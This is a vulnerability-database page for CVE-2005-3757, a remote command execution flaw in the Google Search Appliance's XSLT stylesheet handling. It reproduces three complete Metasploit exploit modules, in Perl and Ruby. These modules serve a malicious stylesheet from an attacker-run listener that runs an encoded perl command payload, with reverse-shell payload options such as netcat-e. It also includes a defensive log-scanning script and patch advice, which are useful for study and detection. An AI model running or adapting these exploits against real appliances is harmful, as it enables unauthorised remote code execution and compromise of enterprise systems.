CVE-2005-3757
CVSS 7.5
Published: 2005-11-22 16:03:00
Revised: 2011-03-07 21:27:05

[Original] The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.


[CNNVD] Google Search Appliance information disclosure and arbitrary code execution vulnerability (CNNVD-200511-320)

        Google Search Appliance is a large-scale, enterprise-grade hardware search appliance.
        The Saxon XSLT parser in the Google Mini Search Appliance (and possibly the Google Search Appliance) allows remote attackers to obtain sensitive information and execute arbitrary code through dangerous Java class methods placed in the select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/h:google:search_appliance    Google Search Appliance
cpe:/h:google:mini_search_appliance    Google Mini Search Appliance

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3757
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3757
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-320
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/15509
(PATCH)  BID  15509
http://www.securityfocus.com/archive/1/archive/1/417310/30/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051121 Google Search Appliance proxystylesheet Flaws
http://www.osvdb.org/20981
(PATCH)  OSVDB  20981
http://securitytracker.com/id?1015246
(VENDOR_ADVISORY)  SECTRACK  1015246
http://metasploit.com/research/vulns/google_proxystylesheet/
(VENDOR_ADVISORY)  MISC  http://metasploit.com/research/vulns/google_proxystylesheet/
http://www.vupen.com/english/advisories/2005/2500
(UNKNOWN)  VUPEN  ADV-2005-2500
http://secunia.com/advisories/17644
(VENDOR_ADVISORY)  SECUNIA  17644

- Vulnerability information

Google Search Appliance information disclosure and arbitrary code execution vulnerability
High severity  Design error
2005-11-22 00:00:00  2005-11-29 00:00:00
Remote
        Google Search Appliance is a large-scale, enterprise-grade hardware search appliance.
        The Saxon XSLT parser in the Google Mini Search Appliance (and possibly the Google Search Appliance) allows remote attackers to obtain sensitive information and execute arbitrary code through dangerous Java class methods placed in the select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.

- Advisories and patches

        The vendor has not yet provided a patch or upgrade program; users of this software are advised to monitor the vendor's homepage for the latest version:
        http://www.google.com/enterprise/gsa/index.html

- Vulnerability information (1333)

Google Search Appliance proxystylesheet XSLT Java Code Execution (EDBID:1333)
hardware remote
2005-11-20 Verified
80 H D Moore
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::google_proxystylesheet_exec;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };

my $info =
{
	'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        => [ 'H D Moore <hdm [at] metasploit.com>' ],
	
	'Description'    => 
		Pex::Text::Freeform(qq{
			This module exploits a feature in the Saxon XSLT parser used by
		the Google Search Appliance. This feature allows for arbitrary
		java methods to be called. Google released a patch and advisory to 
		their client base in August of 2005 (GA-2005-08-m). The target appliance
		must be able to connect back to your machine for this exploit to work.
		}),
		
	'Arch'           => [ ],
	'OS'             => [ ],
	'Priv'           => 0,
	'UserOpts'       => 
		{
			'RHOST'    => [ 1, 'HOST', 'The address of the Google appliance'],
			'RPORT'    => [ 1, 'PORT', 'The port used by the search interface', 80],
			'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
			'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
			'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
		},
	'Payload'        => 
		{
			'Space'    => 1024,
			'Keys'     => [ 'cmd' ],
		},
	'Refs'           => 
		[
			['OSVDB', 20981],
		],
	'DefaultTarget'  => 0,
	'Targets'        =>
		[
			[ 'Google Search Appliance']
		],
	'Keys'           => [ 'google' ],

	'DisclosureDate' => 'Aug 16 2005',
};

sub new
{
	my $class = shift;
	my $self;
	
	$self = $class->SUPER::new(
			{ 
				'Info'     => $info,
				'Advanced' => $advanced,
			},
			@_);

	return $self;
}

sub Check {
	my $self = shift;
	my $s = $self->ConnectSearch;
	
	if (! $s) {
		return $self->CheckCode('Connect');
	}
	
	my $url =
		"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
		"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"output=xml_no_dtd&".
		"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
	
	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	my $page = $s->Recv(-1, 5);
	$s->Close;

	if ($page =~ /cannot be resolved to an ip address/) {
		$self->PrintLine("[*] This system appears to be vulnerable >:-)");
		return $self->CheckCode('Confirmed');
	}
	
	if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
		$self->PrintLine("[*] This system appears to be patched");
	}
	
	$self->PrintLine("[*] This system does not appear to be vulnerable");
	return $self->CheckCode('Safe');	
}


sub Exploit
{
	my $self = shift;
	my ($s, $page);
	
	# Request the index page to obtain a redirect response
	$s = $self->ConnectSearch || return;
	$s->Send("GET / HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 5);
	$s->Close;

	# Parse the redirect to get the client and site values
	my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
	if (! $goog_site || ! $goog_clnt) {
		$self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
		#$self->PrintLine($page);
		#!!! return;
		$goog_site = 'test';
		$goog_clnt = 'test';
	}

	# Create the listening local socket that will act as our HTTP server
	my $lis = IO::Socket::INET->new(
			LocalHost => $self->GetVar('HTTPHOST'),
			LocalPort => $self->GetVar('HTTPPORT'),
			ReuseAddr => 1,
			Listen    => 1,
			Proto     => 'tcp');
	
	if (not defined($lis)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	my $sel = IO::Select->new($lis);
	
	# Send a search request with our own address in the proxystylesheet parameter
	my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
	
	my $proxy =
		"http://".
		($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
		":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
	
	my $url = 
		"/search?client=". $goog_clnt ."&site=". $goog_site .
		"&output=xml_no_dtd&proxystylesheet=". $proxy .
		"&q=". $query ."&proxyreload=1";

	$self->PrintLine("[*] Sending our malicious search request...");
	$s = $self->ConnectSearch || return;
	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 3);
	$s->Close;

	$self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
	
	# Did we receive a connection?
	my @r = $sel->can_read(30);
	
	if (! @r) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;
	}

	my $c = $lis->accept();
	if (! $c) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;	
	}

	my $cli = Msf::Socket::Tcp->new_from_socket($c);
	$self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");	
	$self->ProcessHTTP($cli);
	return;
}

sub ConnectSearch {
	my $self = shift;
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $self->GetVar('RHOST'),
		'PeerPort' => $self->GetVar('RPORT'),
		'SSL'      => $self->GetVar('SSL')
	);
	
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
	return $s;
}

sub ProcessHTTP
{
	my $self = shift;
	my $cli  = shift;
	my $targetIdx = $self->GetVar('TARGET');
	my $target    = $self->Targets->[$targetIdx];
	my $ret       = $target->[1];
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
	my $content;
	my $rhost;
	my $rport;

	# Read the first line of the HTTP request
	my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));

	# The way we call Runtime.getRuntime().exec, Java will split
	# our string on whitespace. Since we are injecting via XSLT,
	# inserting quotes becomes a huge pain, so we do this...
	my $exec_str = 
		'/usr/bin/perl -e system(pack(qq{H*},qq{' .
		unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
		'}))';

	# Load the template from our data section, we have to manually
	# seek and reposition to allow the exploit to be used more
	# than once without a reload.
	seek(DATA, 0, 0);
	while(<DATA>) { last if /^__DATA__$/ }
	while(<DATA>) {	$content .= $_ }

	# Insert our command line
	$content =~ s/:x:MSF:x:/$exec_str/;
	
	# Send it to the requesting appliance
	$rport = $cli->PeerPort;
	$rhost = $cli->PeerAddr;
	$self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
	
	my $res = "HTTP/1.1 200 OK\r\n" .
	          "Content-Type: text/html\r\n" .
	          "Content-Length: " . length($content) . "\r\n" .
	          "Connection: close\r\n" .
	          "\r\n" .
	          $content;

	$self->PrintLine("[*] Sending ".length($res)." bytes...");
	$cli->Send($res);
	$cli->Close;
}

1;

# milw0rm.com [2005-11-20]

- Vulnerability information (16907)

Google Appliance ProxyStyleSheet Command Execution (EDBID:16907)
hardware webapps
2010-07-01 Verified
0 metasploit
##
# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
			'Description'    => %q{
				This module exploits a feature in the Saxon XSLT parser used by
			the Google Search Appliance. This feature allows for arbitrary
			java methods to be called. Google released a patch and advisory to
			their client base in August of 2005 (GA-2005-08-m). The target appliance
			must be able to connect back to your machine for this exploit to work.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9653 $',
			'References'     =>
				[
					['CVE', '2005-3757'],
					['OSVDB', '20981'],
					['BID', '15509'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 4000,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet netcat-e',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 16 2005',
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'DefaultTarget' => 0))
	end

	# Handle incoming requests from the appliance
	def on_request_uri(cli, request)

		print_status("Handling new incoming HTTP request...")

		exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
		data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
		send_response(cli, data)
	end

	def check
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' =>
			{
				'client'          => rand_text_alpha(rand(15)+1),
				'site'            => rand_text_alpha(rand(15)+1),
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
			}
		}, 10)

		if (res and res.body =~ /cannot be resolved to an ip address/)
			print_status("This system appears to be vulnerable")
			return Exploit::CheckCode::Vulnerable
		end

		if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
			print_status("This system appears to be patched")
		end

		print_status("This system is not exploitable")
		return Exploit::CheckCode::Safe
	end


	def exploit

		# load the xml data
		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
		fd = File.open(path, "rb")
		@xml_data = fd.read(fd.stat.size)
		fd.close

		print_status("Obtaining the appliance site and client IDs...")
		# Send a HTTP/1.0 request to learn the site configuration
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.0'
		}, 10)

		if !(res and res['location'] and res['location'] =~ /site=/)
			print_status("Could not read the location header: #{res.code} #{res.message}")
			return
		end

		m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
		if !(m and m[1] and m[2])
			print_status("Invalid location header: #{res['location']}")
			return
		end

		print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
		start_service

		print_status("Requesting a search using our custom XSLT...")
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' =>
			{
				'client'          => m[2],
				'site'            => m[1],
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
				'proxyreload'     => '1'
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print_status("Waiting on the payload to execute...")
			select(nil,nil,nil,20)
		else
			print_status("No response from the server")
		end

		print_status("Shutting down the web service...")
		stop_service
	end

end

- Vulnerability information (F82357)

Google Appliance ProxyStyleSheet Command Execution (PacketStormID:F82357)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,java,arbitrary
CVE-2005-3757

This Metasploit module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
			'Description'    => %q{
				This module exploits a feature in the Saxon XSLT parser used by
			the Google Search Appliance. This feature allows for arbitrary
			java methods to be called. Google released a patch and advisory to 
			their client base in August of 2005 (GA-2005-08-m). The target appliance
			must be able to connect back to your machine for this exploit to work.		
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3757'],
					['OSVDB', '20981'],
					['BID', '15509'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 4000,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet netcat-e',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 16 2005',
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'DefaultTarget' => 0))
	end

	# Handle incoming requests from the appliance
	def on_request_uri(cli, request)
	
		print_status("Handling new incoming HTTP request...")
		
		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
		
		fd = File.open(path, "r")
		data = fd.read
		fd.close

		exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
		data.gsub!(/:x:MSF:x:/, exec_str)
		send_response(cli, data)
	end
	
	def check
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' => 
			{
				'client'          => rand_text_alpha(rand(15)+1),
				'site'            => rand_text_alpha(rand(15)+1),
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
			}
		}, 10)
		
		if (res and res.body =~ /cannot be resolved to an ip address/)
			print_status("This system appears to be vulnerable")
			return Exploit::CheckCode::Vulnerable
		end
		
		if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
			print_status("This system appears to be patched")
		end
		
		print_status("This system is not exploitable")
		return Exploit::CheckCode::Safe
	end
	
	
	def exploit
	
		print_status("Obtaining the appliance site and client IDs...")
		# Send a HTTP/1.0 request to learn the site configuration
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.0'
		}, 10)
		
		if !(res and res['location'] and res['location'] =~ /site=/)
			print_status("Could not read the location header: #{res.code} #{res.message}")
			return
		end
		
		m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
		if !(m and m[1] and m[2])
			print_status("Invalid location header: #{res['location']}")
			return		
		end
	
		print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
		start_service
	
		print_status("Requesting a search using our custom XSLT...")
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' => 
			{
				'client'          => m[2],
				'site'            => m[1],
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
				'proxyreload'     => '1'
			}
		}, 25)
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print_status("Waiting on the payload to execute...")
			sleep(20)
		else
			print_status("No response from the server")
		end
		
		print_status("Shutting down the web service...")
		stop_service
	end
	
end


- Vulnerability information

20981
Google Search Appliance proxystylesheet XSLT Java Code Execution
Remote / Network Access Other
Loss of Integrity
Exploit Public

- Vulnerability description

The Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.
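The request shape described above, a search whose proxystylesheet parameter is an absolute URL, is visible in ordinary web access logs, so it can be hunted for without touching the appliance. The following is an added detection example written for this page; it is not code from the advisory, from OSVDB, or from the Metasploit modules reproduced above. It assumes Apache/nginx "combined" log format, an operator-supplied list of hosts that may legitimately serve stylesheets, and the hypothetical helper names used below; every sample log line is constructed for illustration.

```python
"""Flag Google Search Appliance /search requests that make the appliance pull an
external XSLT stylesheet through the proxystylesheet parameter (CVE-2005-3757).

Added example, not code from the advisory or the Metasploit modules on this page.
Assumptions: access logs in Apache/nginx "combined" format, a trusted-host list
supplied by the operator, and constructed sample lines (SAMPLE_LOG below).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: a plain search, a search using an on-appliance
# frontend stylesheet (bare name, no fetch), a probe naming an unresolvable host
# (the check pattern used by the modules above), and a request pointing the
# appliance at an external listener with proxyreload=1 (the exploit pattern).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Nov/2005:10:00:01 +0000] "GET /search?client=default&site=intranet&output=xml_no_dtd&q=budget HTTP/1.0" 200 5120',
    '10.0.0.5 - - [21/Nov/2005:10:00:07 +0000] "GET /search?client=default&site=intranet&output=xml_no_dtd&q=budget&proxystylesheet=default_frontend HTTP/1.0" 200 5120',
    '203.0.113.9 - - [21/Nov/2005:10:01:12 +0000] "GET /search?client=abc&site=xyz&output=xml_no_dtd&q=qq&proxystylesheet=http://kz9s2/ HTTP/1.0" 200 812',
    '203.0.113.9 - - [21/Nov/2005:10:01:40 +0000] "GET /search?client=default&site=intranet&output=xml_no_dtd&proxystylesheet=http://203.0.113.9:8080/a7f3.xsl&q=x&proxyreload=1 HTTP/1.0" 200 412',
    'this line is deliberately unparseable',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze_request(target, trusted_hosts=()):
    """Return a finding for a /search request whose proxystylesheet value is an
    absolute http(s) URL (i.e. the appliance will fetch it), otherwise None."""
    parts = urlsplit(target)
    if parts.path != "/search":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    sheets = qs.get("proxystylesheet")
    if not sheets:
        return None
    sheet = urlsplit(sheets[0])
    if sheet.scheme not in ("http", "https"):
        return None  # bare frontend name stored on the appliance, not an external fetch
    host = sheet.hostname or ""
    reasons = ["external stylesheet fetch"]
    if host not in trusted_hosts:
        reasons.append("stylesheet host not in trusted list")
    if qs.get("proxyreload", [""])[0] == "1":
        reasons.append("proxyreload=1 (the parameter the exploit modules on this page set)")
    if sheet.port is not None:
        reasons.append(f"explicit port {sheet.port}")
    return {"stylesheet_url": sheets[0], "stylesheet_host": host, "reasons": reasons}


def scan_log(lines, trusted_hosts=()):
    """Run analyze_request over every parseable GET line; attach client ip, time and status."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        finding = analyze_request(rec["target"], trusted_hosts)
        if finding:
            finding.update(ip=rec["ip"], ts=rec["ts"], status=rec["status"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, trusted_hosts={"gsa-frontends.example.internal"}):
        print(f"{f['ts']} {f['ip']} -> {f['stylesheet_url']}: {'; '.join(f['reasons'])}")
```

Only absolute http(s) values are flagged, because a bare frontend name is rendered from the appliance's own stylesheet store and never causes an outbound fetch; both the check probe (a random unresolvable hostname) and the exploit (the attacker's own listener, with proxyreload=1 to defeat caching) fall on the flagged side. On the constructed sample the scanner reports the two requests from 203.0.113.9 and nothing from the internal client. Run it against the appliance's access logs or those of a proxy in front of it; any hit from a host outside the trusted list is a reason to confirm the GA-2005-08-m upgrade state.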

- Timeline

2005-11-21 2005-06-10
2005-11-21 Unknown

- Solution

Upgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author
